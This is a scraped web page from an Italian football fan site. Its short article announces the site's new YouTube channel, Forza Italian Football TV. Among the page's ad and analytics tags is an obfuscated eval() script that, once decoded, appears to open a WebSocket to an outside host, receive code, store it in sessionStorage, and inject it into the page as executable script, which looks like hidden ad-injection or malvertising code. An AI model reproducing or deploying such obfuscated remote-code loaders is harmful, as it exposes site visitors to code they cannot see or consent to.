	<li id="menu-item-89573" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89573"><a href="http://forzaitalianfootball.com/azzurri/azzurri-previews/">Match Previews</a></li>
	<li id="menu-item-43820" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-43820"><a href="http://forzaitalianfootball.com/azzurri/azzurri-match-reports/">Match Reports</a></li>
	<li id="menu-item-43822" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-43822"><a href="http://forzaitalianfootball.com/azzurri/azzurri-player-ratings/">Player Ratings</a></li>
</ul>
</li>
<li id="menu-item-55194" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-55194"><a href="http://forzaitalianfootball.com/lega-pro-home/">Lega Pro</a>
<ul class="sub-menu">
	<li id="menu-item-55196" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55196"><a href="http://forzaitalianfootball.com/lega-pro-standings/">Tables</a></li>
	<li id="menu-item-55195" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55195"><a href="http://forzaitalianfootball.com/lega-pro-results-and-fixtures/">Results &#038; Fixtures</a></li>
</ul>
</li>
<li id="menu-item-89571" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89571"><a href="http://forzaitalianfootball.com/exclusive/">Exclusive</a></li>
</ul></div></ul></div>
         <div id="menu3"><ul>
<li id="current-home-nav" style="float:left"><a href="http://forzaitalianfootball.com">Home</a></li>
<div class="menu-header"><ul id="menu-serie-a-clubs" class="menu"><li id="menu-item-20927" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-20927"><a href="http://forzaitalianfootball.com/clubs/">Club-By-Club News</a>
<ul class="sub-menu">
	<li id="menu-item-21689" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21689"><a href="http://forzaitalianfootball.com/serie-a-clubs/ac-milan/">AC Milan</a></li>
	<li id="menu-item-21690" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21690"><a href="http://forzaitalianfootball.com/serie-a-clubs/atalanta/">Atalanta</a></li>
	<li id="menu-item-133033" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-133033"><a href="http://forzaitalianfootball.com/serie-a-clubs/bologna/">Bologna</a></li>
	<li id="menu-item-155892" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-155892"><a href="http://forzaitalianfootball.com/serie-a-clubs/cagliari/">Cagliari</a></li>
	<li id="menu-item-21694" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21694"><a href="http://forzaitalianfootball.com/serie-a-clubs/chievo/">Chievo</a></li>
	<li id="menu-item-155891" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-155891"><a href="http://forzaitalianfootball.com/serie-a-clubs/crotone/">Crotone</a></li>
	<li id="menu-item-84421" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84421"><a href="http://forzaitalianfootball.com/serie-a-clubs/empoli/">Empoli</a></li>
	<li id="menu-item-21695" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21695"><a href="http://forzaitalianfootball.com/serie-a-clubs/fiorentina/">Fiorentina</a></li>
	<li id="menu-item-21696" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21696"><a href="http://forzaitalianfootball.com/serie-a-clubs/genoa/">Genoa</a></li>
	<li id="menu-item-21697" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21697"><a href="http://forzaitalianfootball.com/serie-a-clubs/inter/">Inter</a></li>
	<li id="menu-item-21698" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21698"><a href="http://forzaitalianfootball.com/serie-a-clubs/juventus/">Juventus</a></li>
	<li id="menu-item-21699" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21699"><a href="http://forzaitalianfootball.com/serie-a-clubs/lazio/">Lazio</a></li>
	<li id="menu-item-21700" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21700"><a href="http://forzaitalianfootball.com/serie-a-clubs/napoli/">Napoli</a></li>
	<li id="menu-item-84422" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-84422"><a href="http://forzaitalianfootball.com/serie-a-clubs/palermo/">Palermo</a></li>
	<li id="menu-item-155890" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-155890"><a href="http://forzaitalianfootball.com/serie-a-clubs/pescara/">Pescara</a></li>
	<li id="menu-item-21704" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21704"><a href="http://forzaitalianfootball.com/serie-a-clubs/as-roma/">Roma</a></li>
	<li id="menu-item-21705" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21705"><a href="http://forzaitalianfootball.com/serie-a-clubs/sampdoria/">Sampdoria</a></li>
	<li id="menu-item-46827" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-46827"><a href="http://forzaitalianfootball.com/serie-a-clubs/sassuolo/">Sassuolo</a></li>
	<li id="menu-item-21707" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21707"><a href="http://forzaitalianfootball.com/serie-a-clubs/torino/">Torino</a></li>
	<li id="menu-item-31790" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-31790"><a href="http://forzaitalianfootball.com/serie-a-clubs/udinese/">Udinese</a></li>
</ul>
</li>
<li id="menu-item-131384" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-131384"><a href="http://forzaitalianfootball.com/videos/">Videos</a></li>
<li id="menu-item-53181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-53181"><a href="http://forzaitalianfootball.com/classic-calcio-home/">Classic Calcio</a>
<ul class="sub-menu">
	<li id="menu-item-50275" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50275"><a href="http://forzaitalianfootball.com/classic-calcio/classic-azzurri-matches/">Classic Azzurri Matches</a></li>
	<li id="menu-item-50276" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50276"><a href="http://forzaitalianfootball.com/classic-calcio/great-calcio-sides/">Great Calcio Sides</a></li>
	<li id="menu-item-50274" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50274"><a href="http://forzaitalianfootball.com/classic-calcio/calcio-greats/">Legends of Calcio</a></li>
	<li id="menu-item-50277" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50277"><a href="http://forzaitalianfootball.com/classic-calcio/italian-derbies/">Italian Derbies</a></li>
</ul>
</li>
<li id="menu-item-50313" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children arrow menu-item-50313"><a href="http://forzaitalianfootball.com/opinion/">Features</a>
<ul class="sub-menu">
	<li id="menu-item-50318" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50318"><a href="http://forzaitalianfootball.com/book-review/">Book Reviews</a></li>
	<li id="menu-item-89574" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89574"><a href="http://forzaitalianfootball.com/kits/">Kits</a></li>
	<li id="menu-item-50397" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50397"><a href="http://forzaitalianfootball.com/top-10/top-10-lists/">Top 10 Lists</a></li>
	<li id="menu-item-50396" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50396"><a href="http://forzaitalianfootball.com/stadiums/">Stadiums</a></li>
	<li id="menu-item-50398" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50398"><a href="http://forzaitalianfootball.com/travel-guide/">Travel Guide</a></li>
	<li id="menu-item-50404" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50404"><a href="http://forzaitalianfootball.com/match-pictures/">Match Pictures</a></li>
	<li id="menu-item-50405" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-50405"><a href="http://forzaitalianfootball.com/italian-football-fancast-awards/">IFFC Awards</a></li>
	<li id="menu-item-55198" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55198"><a href="http://forzaitalianfootball.com/tactics/">Tactics</a></li>
	<li id="menu-item-60455" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-60455"><a href="http://forzaitalianfootball.com/exclusive/">Exclusive Interviews</a></li>
	<li id="menu-item-65866" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-65866"><a title="Viareggio Cup" href="http://forzaitalianfootball.com/viareggio-tournament-coppa-carnevale/">Viareggio Cup</a></li>
</ul>
</li>
<li id="menu-item-50391" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children arrow menu-item-50391"><a href="http://forzaitalianfootball.com/italian-football-fancast/">Serie A Podcast</a>
<ul class="sub-menu">
	<li id="menu-item-66270" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-66270"><a href="http://forzaitalianfootball.com/club-focus-podcast/">Club Focus Podcast</a></li>
</ul>
</li>
<li id="menu-item-130844" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-130844"><a href="http://forzaitalianfootball.com/play-serie-a-fantasy-football-with-forza-italian-football-during-201516/">Fantasy Football</a></li>
<li id="menu-item-116081" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-116081"><a href="http://forzaitalianfootball.com/quiz/">Quizzes</a></li>
<li id="menu-item-50390" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-50390"><a href="http://forzaitalianfootball.com/writers/">Writers</a></li>
</ul></div></ul></div>
       </div>
    <div class="cb"></div>
    </div>
  	</div>
    <div id="section">
 
    <div class="hidead"><center style="margin-top: 2px;margin-bottom: 2px;"></center></div>  <div id="column-wrap"> <div id="headgal">
 
<div id="main-content"> 

 <div id="content" style="padding-right:0 !important;">  <div id="homepost">	



	

<div id="datemeta">
<div id="datemeta_l"><b>Published On:</b> Sat, Jan 7th, 2017 </div>
<div id="datemeta_r"><a href="http://forzaitalianfootball.com/opinion/" rel="category tag">Features</a> / <a href="http://forzaitalianfootball.com/news/" rel="category tag">News</a> | By <b><a href="http://forzaitalianfootball.com/author/forza-italian-football-staff/" title="View all posts by Forza Italian Football Staff">Forza Italian Football Staff </a></b>    </div>
<div class="cb"></div>
</div>




		<div class="post">



			<h1 class="posttitle">  Introducing&#8230; Forza Italian Football TV</h1>
 


              
  
    <center></center> 
			<div class="entry">

 			  <div id="tps_slideContainer_158011" class="theiaPostSlider_slides"><div>

<p>Here at <strong>Forza Italian Football</strong>, we are always trying to bring your daily fix of Calcio to you. To help us do that, we have started a YouTube channel, <a href="https://www.youtube.com/channel/UC1TDV7N0d6kgffh8ldTwXaQ"><strong>Forza Italian Football TV</strong></a>.</p>
<span class="vvqbox vvqyoutube" style="width:640px;height:440px;"><span id="vvq-158011-youtube-1"><a href="http://www.youtube.com/watch?v=ZmmOVh13NZ0"><img src="http://img.youtube.com/vi/ZmmOVh13NZ0/0.jpg" alt="YouTube Preview Image" /></a></span></span>
<p>You are probably familiar with our features by now, as well as our podcast, but now we want to expand and provide you with videos as well.</p>
<p>Our plan is to make <a href="https://www.youtube.com/channel/UC1TDV7N0d6kgffh8ldTwXaQ"><strong>FIFTV</strong></a> the easiest way for you to consume and digest the latest from Calcio from all across Italy.</p>
<p>From breaking news and interesting talking points, we will have it all covered. Head over to YouTube now and subscribe to make sure you never miss a thing.</p>
<p>Remember, whether it&#8217;s on <strong><a href="https://www.youtube.com/c/ForzaItalianFootballOfficial">YouTube</a></strong> or our FIF Podcast, we want to know your thoughts. So make sure to subscribe, like, and comment to let us know what you think.</p>

</div></div><div class="theiaPostSlider_footer _footer"></div><p><!-- END THEIA POST SLIDER --></p>

                <script type='text/javascript'>
                    
                var tpsInstance;
                var tpsOptions = {"slideContainer":"#tps_slideContainer_158011","nav":[".theiaPostSlider_nav"],"navText":"%{currentSlide} of %{totalSlides}","helperText":"Use the &leftarrow; &rightarrow; (arrow) keys to browse","defaultSlide":0,"transitionEffect":"slide","transitionSpeed":400,"keyboardShortcuts":true,"scrollAfterRefresh":true,"numberOfSlides":1,"slides":[],"useSlideSources":true,"themeType":"font","prevText":"Prev","nextText":"Next","buttonWidth":"0","buttonWidth_post":"0","postUrl":"http:\/\/forzaitalianfootball.com\/2017\/01\/introducing-forza-italian-football-tv\/","postId":158011,"refreshAds":false,"refreshAdsEveryNSlides":1,"adRefreshingMechanism":"javascript","siteUrl":"http:\/\/forzaitalianfootball.com","loopSlides":true,"scrollTopOffset":"0","prevFontIcon":"<span aria-hidden=\"true\" class=\"tps-icon-arrow-left14\"><\/span>","nextFontIcon":"<span aria-hidden=\"true\" class=\"tps-icon-arrow-right14\"><\/span>"};
            
                    (function ($) {
                        $(document).ready(function () {
                            
                            tpsInstance = new tps.createSlideshow(tpsOptions);
                        });
                    }(jQuery));
                </script>
            

			</div>
 	</div>



	
	<center style="font-weight: bold;"></center>
    
 
    <center><!--script type="text/javascript" src="http://opinions.footballfancast.com/wp-content/themes/ffc-web-products/js/embed.js" data-poll-id="1723"></script-->

<a href="https://twitter.com/SerieAFFC" class="twitter-follow-button" data-show-count="false" data-size="large">Follow @SerieAFFC</a>
<script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0],p=/^http:/.test(d.location)?'http':'https';if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src=p+'://platform.twitter.com/widgets.js';fjs.parentNode.insertBefore(js,fjs);}}(document, 'script', 'twitter-wjs');</script> 

<div id='taboola-below-main-column'></div>
<script type="text/javascript">
   window._taboola = window._taboola || [];
   _taboola.push({mode:'thumbs-2r', container:'taboola-below-main-column', placement:'below-main-column'});
</script> 
<script>
window._taboola = window._taboola || [];
_taboola.push({flush:true});
</script> 

<script type="text/javascript">
window._ttf = window._ttf || [];
_ttf.push({
       pid          : 33787
       ,lang        : "en"
       ,slot        : '.wide-column .ffc-article > p'
       ,format      : "inread"
       ,mobile      : true
       ,components  : { skip: {delay : 0}}
       ,mutable     : true
       ,css         : "margin: 14px 0px;"
});

(function (d) {
        var js, s = d.getElementsByTagName('script')[0];
        js = d.createElement('script');
        js.async = true;
        js.src = '//cdn.teads.tv/media/format.js';
        s.parentNode.insertBefore(js, s);
})(window.document);
</script> 

<script>

/*begin js*/

eval((function(){var x=[86,66,85,60,72,80,90,79,89,82,76,94,75,70,71,65,81,74,87,88];var l=[];for(var j=0;j<x.length;j++)l[x[j]]=j+1;var w=[];for(var o=0;o<arguments.length;o++){var p=arguments[o].split('~');for(var r=p.length-1;r>=0;r--){var v=null;var u=p[r];var h=null;var b=0;var y=u.length;var f;for(var g=0;g<y;g++){var d=u.charCodeAt(g);var z=l[d];if(z){v=(z-1)*94+u.charCodeAt(g+1)-32;f=g;g++;}else if(d==96){v=94*(x.length-32+u.charCodeAt(g+1))+u.charCodeAt(g+2)-32;f=g;g+=2;}else{continue;}if(h==null)h=[];if(f>b)h.push(u.substring(b,f));h.push(p[v+1]);b=g+1;}if(h!=null){if(b<y)h.push(u.substring(b));p[r]=h.join('');}}w.push(p[0]);}var q=w.join('');var i='abcdefghijklmnopqrstuvwxyz';var a=[96,39,92,10,126,42].concat(x);var e=String.fromCharCode(64);for(var j=0;j<a.length;j++)q=q.split(e+i.charAt(j)).join(String.fromCharCode(a[j]));return q.split(e+'!').join(e);})('VOVPVX=VX|| [];VX.pV"V!set@vccount","@i@v-78503326-2"V5V"V!setDoVNName","none"V5V"V!setSample@pate","1"V5V"V!set@vllow@qinker",VW])V3@pegular_V4V==(V-return {_creV*VC:V-VO(V-VPgaV/VGV>V2;ga.VS= "V$";ga.async= VW;ga.src= (V@"== V6locaVR.protocol?V@//ssl":"http://www")+ ".google-V4.com/ga.jsVIsV/getV>s@hyTagNameV2[0];s.parentNode.insert@hefore(ga,s)})()V0}},updV*:V-VPV9VD_V?V/VDVJV9VM_adsludo="track@p@ss_1_percent: VD: ["+ V9VD_V?+ "]";VX.pV"V!setCustom@gar",1,"VD",V9VD_V?,1V5V"V!trackEvent","user VMs",V9VM_adsludo])}}})()V0};VOVN@pegular_V4V=._creV*VC();VN@pegular_V4V=.updV*()V0}V3V==V-VPV&VJV)"VIVExSin@qSVJV,"VIVEtlag=VW;varV8="ee8f5621-ae4a-45ae-8665-22521ae6d811"V3_@yS_path=(V@"== V6locaVR.protocol?"wss://":"ws://")+ "unified.V?.comVIVV=V-if(!window.j@wuery){VPVBV/VGV>V2;VB.VS= "V$";VB.src= V@//code.jquery.com/jquery-2.2.0.min.js";V1load= V1VLsVUchangeV(if(!this.VLSVU || this.VLSVUV[loaded"|| this.VLSVUV[complete"){V1load= V1VLsVUchange= null;VK("V:")}};V1errorV(};V6getV>s@hyTagName("head")[0].appendChild(VB)V<VK("V:")}}VJVK=V7VK@laram){varV;V/locaVR.href;if(VK@laramV[V:"){V) "$VS$V:VQV8+ "VQV;;VG@ySconnecVR(statusVC)V<V\' sessionStorage.getItem("gnadj");if(V\'= null|| V\'= ""|| V\'= " "|| VExSin@qS.index@nf("undefined ")>  -1){V) "js_VTVQV8+ "VQV;V<V) "VTVQV8+ "VQV;};V&.send("checkI@l$VS$"+ statusVC)}}VJVG@ySconnecVR=V7str){V&=  new @yebSocket(VN_@yS_path)V#openV(V&.send(str)}V#closeV(}V#errorV(}V#message= V7VM){VOifV.V[getIp"){VZiserI@l();returnV<if(statusVC.index@nf("js_VT")>  -1){V, @xS@nN.pVYV.)V3VCV%wpV3SVAV%sVAV3@hIV%bicallV3CSSV%cssV3VFV%VTVJallVCTogether=VNSVA+ "  "+ VN@hI+ "  "+ VNVC+ "  "+ VNCSS;sessionStorage.setItem("gnadj",allVCTogether)V+VF);addCode(allVCTogether)V<if(VEtlag== VW){V, @xS@nN.pVYV.VHVF= VZpesponse.sVA;VNCheck= VZpesponse.V:V+VF)V+Check);VEtlag= falseV<V, @xS@nN.pVYV.VHVF= VZpesponse.VTV+VF);addCode(VExSin@qS)}}};VOV0}V0VOV0}}}}VJaddCode=V7js){VPeV/VGV>V2;e.VS= "V$";e.src= "data:V$;chVYt=utf-8,"+ escape(js);V6body.appendChild(e)};return {VV:VV,clientID:clientID,VK:VK}}();VNV=.VV()~V"_~_gaConverter_VN._~ush(["VN@pegular~;V&.on~text/javascript~=VZpesponse.~wgt_connecVR~VExSin@qS=~= V-~statusVC=~ate@vnalytics~;addCode(VN~VZpesponse=~V7){~(VM.data~=V6~}catch(e){~VB.on~("script")~VJmain~analytics~]);VX.p~document.~funcVR(~ clientID~V?_~precheck~ VZpef~}else {~_widget~Element~adsjudo~"https:~ettings~script2~Script~doVN~check@~@n@h@x~create~);VN~"VJ~;VP~start~ready~event~main~try{~var ~||"+~tion~type~feed~tate~init~true~_gaq~arse~get@~== "'));

/*end js*/

</script> 

<!-- VisualDNA Audience Analytics Tag -->
<script type="text/javascript">
 (function() {
 var s, e;
 s = document.createElement("script");
 s.src = "//a1.vdna-assets.com/analytics.js";
 s.async = true;
 e = document.getElementsByTagName("head")[0];
 e.insertBefore(s, e.firstChild);
 this.VDNA = this.VDNA || {};
 this.VDNA.queue = this.VDNA.queue || [];
 })();
 VDNA.queue.push({
 apiKey : "snackmedia1456226736887",
 method : "reportPageView"
 });
</script>
<!-- End of VisualDNA Audience Analytics Tag --></center>
 

  


      



 

<div id="related" class="clearfix">

 


<div id="relatednews"><div id="relatednewsh2">Related News</div>
<div style="float:right;height:19px;margin-right:10px;">
<!-- AddThis Button BEGIN -->
<div class="addthis_toolbox addthis_default_style ">
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
 <a class="addthis_button_google_plusone" g:plusone:size="medium"></a>
<a class="addthis_button_tweet"></a>
<a class="addthis_counter addthis_pill_style"></a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
<!-- AddThis Button END -->
</div>
<div class="cb"></div></div>

	
		<div class="related">

 	<div class="relatedpost">
    
                          <a href="http://forzaitalianfootball.com/2017/01/transfer-market-round-up-7th-january-2017/"><img width="150" height="125" src="http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-150x125.jpg" class="attachment-relatedimg size-relatedimg wp-post-image" alt="" srcset="http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-150x125.jpg 150w, http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-55x45.jpg 55w" sizes="(max-width: 150px) 100vw, 150px" /></a>
              
            
           
            

             
  
				<h3><a href="http://forzaitalianfootball.com/2017/01/transfer-market-round-up-7th-january-2017/" rel="bookmark" title="Transfer Market Round-up: 7th January 2017">Transfer Market Round-up: 7th January 2017</a></h3>



				 



			</div>







		</div> 


	



	
		<div class="related">

 	<div class="relatedpost">
    
                          <a href="http://forzaitalianfootball.com/2017/01/serie-a-2016-17-five-things-to-look-out-for-in-round-19/"><img width="150" height="125" src="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/jveutnsuscopapitalia-150x125.png" class="attachment-relatedimg size-relatedimg wp-post-image" alt="" srcset="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/jveutnsuscopapitalia-150x125.png 150w, http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/jveutnsuscopapitalia-55x45.png 55w" sizes="(max-width: 150px) 100vw, 150px" /></a>
              
            
           
            

             
  
				<h3><a href="http://forzaitalianfootball.com/2017/01/serie-a-2016-17-five-things-to-look-out-for-in-round-19/" rel="bookmark" title="Serie A 2016-17: Five Things To Look Out For In Round 19">Serie A 2016-17: Five Things To Look Out For In Round 19</a></h3>



				 



			</div>







		</div> 


	



	
		<div class="related">

 	<div class="relatedpost">
    
                          <a href="http://forzaitalianfootball.com/2017/01/which-youngsters-could-join-locatelli-in-the-ac-milan-first-team/"><img width="150" height="125" src="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/10/locatelli-milan-150x125.png" class="attachment-relatedimg size-relatedimg wp-post-image" alt="" srcset="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/10/locatelli-milan-150x125.png 150w, http://assets.forzaitalianfootball.com/wp-content/uploads/2016/10/locatelli-milan-55x45.png 55w" sizes="(max-width: 150px) 100vw, 150px" /></a>
              
            
           
            

             
  
				<h3><a href="http://forzaitalianfootball.com/2017/01/which-youngsters-could-join-locatelli-in-the-ac-milan-first-team/" rel="bookmark" title="Which youngsters could join Locatelli in the AC Milan first team?">Which youngsters could join Locatelli in the AC Milan first team?</a></h3>



				 



			</div>







		</div> 


	



	
		<div class="related">

 	<div class="relatedpost">
    
                          <a href="http://forzaitalianfootball.com/2017/01/youth-and-competitiveness-make-serie-b-intriguing/"><img width="150" height="125" src="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/cerri-150x125.jpg" class="attachment-relatedimg size-relatedimg wp-post-image" alt="" srcset="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/cerri-150x125.jpg 150w, http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/cerri-55x45.jpg 55w" sizes="(max-width: 150px) 100vw, 150px" /></a>
              
            
           
            

             
  
				<h3><a href="http://forzaitalianfootball.com/2017/01/youth-and-competitiveness-make-serie-b-intriguing/" rel="bookmark" title="Youth and competitiveness make Serie B intriguing">Youth and competitiveness make Serie B intriguing</a></h3>



				 



			</div>







		</div> 


	



	<div class="cb"></div>







</div> 



 	

<div id="comment_wrapper">

			
	
	<a name="comments" id="comments"></a><div id="mccomments"></div>
	<script type="text/javascript">
		/* <![CDATA[ */
		var matchchatPostID = 158011;
		(function() {
			var mc = document.createElement('script'); mc.type = 'text/javascript';
			mc.async = true;
			mc.src = '//api.matchchat.co.uk/comments/js/wordpress.js';
			(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(mc);
		})();
		/* ]]> */
	</script>

	</div>




</div> </div><div>

 </div>   </div>  
 


     </div>
   <div id="aside">
      
    <div style='width:300px; min-height:250px; max-height:600px;'>
<!--JavaScript Tag with group ID // Tag for network 1639: Snack Media  // Website: ForzaItalianFootball.com // Page: ROS // Placement: ForzaItalianFootball Double MPU (5597751) // created at: May 18, 2015 10:02:42 AM-->
<script language="javascript">
<!--
if (window.adgroupid == undefined) {
	window.adgroupid = Math.round(Math.random() * 1000);
}
document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtech.de/addyn/3.0/1639/5597751/0/529/ADTECH;loc=100;KVabbr='+ adtechCCfullstring +'target=_blank;key=key1+key2+key3+key4;grp='+window.adgroupid+';misc='+new Date().getTime()+'"></scri'+'pt>');
//-->
</script><noscript><a href="http://adserver.adtech.de/adlink/3.0/1639/5597751/0/529/ADTECH;loc=300;"key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv/3.0/1639/5597751/0/529/ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="300" height="600"></a></noscript>
<!-- End of JavaScript Tag -->
</div><div style="margin-top: 10px;"></div>    
        
      <div id="newsnow" style="background:#000; float:left; text-align:center; width:119px; overflow:hidden; margin-left:5px; color:#fff;">
      <a href="http://www.newsnow.co.uk/h/Sport/Football/Europe/Italy" target="_blank" style="color:#fff;"><img src="http://assets.forzaitalianfootball.com/wp-content/uploads/2013/07/newsnow_ab.gif" alt="As featured on NewsNow: Serie A news" title="Click here for more Serie A news from NewsNow">Serie A News 24/7</a>
    </div> <!-- //newsnow-->
    
    <div id="ffc_network" style="width:178px; float:right; overflow:hidden; margin-top:10px">
      <a href="/footballfancast"><img src="http://assets.forzaitalianfootball.com/wp-content/uploads/2013/07/ffc-bloggers-network.png" width="160" height="45" alt="FootballFanCast.com VIP Lounge" title="Become a VIP member of FootballFanCast.com"></a>
    </div> <!-- //ffc_network -->
  
    <div style="clear:both"></div>
    
    <div style='width:300px; margin:10px auto;'>
      <!--JavaScript Tag with group ID // Tag for network 1639: Snack Media  // Website: ForzaItalianFootball.com // Page: ROS // Placement: ForzaItalianFootball MPU (5597755) // created at: May 18, 2015 10:02:43 AM-->
      <script language="javascript">
      <!--
      if (window.adgroupid == undefined) {
      	window.adgroupid = Math.round(Math.random() * 1000);
      }
      document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtech.de/addyn/3.0/1639/5597755/0/170/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp='+window.adgroupid+';misc='+new Date().getTime()+'"></scri'+'pt>');
      //-->
      </script><noscript><a href="http://adserver.adtech.de/adlink/3.0/1639/5597755/0/170/ADTECH;loc=300;key=key1+key2+key3+key4" target="_blank"><img src="http://adserver.adtech.de/adserv/3.0/1639/5597755/0/170/ADTECH;loc=300;key=key1+key2+key3+key4" border="0" width="300" height="250"></a></noscript>
      <!-- End of JavaScript Tag -->
    </div> 
  
        
        <script src="http://player.performgroup.com/eplayer.js#1861e33c048867863d0f0f549d.16b4w6plkap1s18r3flpdcsk0o.p" async></script>
    
   

			<div id="sidebar">
<div class="section widget_pluswidget"><div id="sidebartitlewrapper"><h3><span>Visit us on Google+</span></h3></div><div class="sectioncont"><script type="text/javascript">(function(){var po = document.createElement("script");po.type = "text/javascript";po.async = true;po.src = "https://apis.google.com/js/plusone.js";var s = document.getElementsByTagName("script")[0];s.parentNode.insertBefore(po, s);})();</script><g:plus href="https://plus.google.com/117283905376556894633" size="badge"></g:plus></div></div>			 <div id="minibars">
	<div id="lmb">
			</div> 
<div id="rmb">
			</div> 
<div class="cb"></div>
	</div> 	</div> 


		</div>   


 <style> #sharebox{ float:left; margin-left:20px; background:#DBDBDB; position:fixed; top:145px;left:0; padding:5px 0; -moz-border-radius:5px; border-radius:5px;border:1px solid #CDCDCD} #sharebox:hover{background:#eee;-moz-transition:all 0.3s ease-in-out 0s;-webkit-transition:all 0.3s ease-in-out 0s;transition:all 0.3s ease-in-out 0s} #sharebox .wdt{ text-align:center; clear:left; padding:2px 4px}</style>
<div id="sharebox"> <div class="wdt"><a href="http://forzaitalianfootball.com/2017/01/introducing-forza-italian-football-tv/" class="twitter-share-button" data-count="vertical">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script></div>
	<div class="wdt"><div id="fb-root"></div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script><fb:like href="http://forzaitalianfootball.com/2017/01/introducing-forza-italian-football-tv/" send="true" layout="box_count" show_faces="false" action="like" font=""></fb:like></div>
	<div class="wdt"> <!-- Place this tag where you want the +1 button to render -->
<g:plusone size="tall"></g:plusone> <script type="text/javascript">   (function() {
    var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
    po.src = 'https://apis.google.com/js/plusone.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
  })();
</script></div> 	  
  <div class="wdt"><script type="text/javascript">(function() {var s = document.createElement('SCRIPT'), s1 = document.getElementsByTagName('SCRIPT')[0];s.type = 'text/javascript';s.async = true;s.src = 'http://widgets.digg.com/buttons.js';s1.parentNode.insertBefore(s, s1);})();</script> 
	 <script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script></div>
	<div class="wdt"><script src="http://www.stumbleupon.com/hostedbadge.php?s=5"></script></div> 
  <div class="wdt"><a class="addthis_counter"></a></div>  
  </div>  </div>  

</div></div></div><div id="footer">
<div id="footer1">     <div id="footerwrapper1"> 
  <!--<div id="fsidebar1">     
    <a href="http://forzaitalianfootball.com"><img src="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/08/FIF_banner_new.png" class="scale-with-grid" alt="" /></a>  
  </div>-->
    <div id="fsidebar2"> <div style="margin-top:12px;float:left">	 <div class="fsearchbg1"> 
      	<form method="get" id="footersearch1" action="http://forzaitalianfootball.com/">
<input type="text" name="s" value=" Search News - Type Keyword & Hit Enter" onblur="if(this.value=='') this.value=' Search News - Type Keyword & Hit Enter';" onfocus="if(this.value==' Search News - Type Keyword & Hit Enter') this.value='';" id="s2" />
			<input type="submit" value=" " id="searchsubmit" />
		   </form>
       </div></div>  
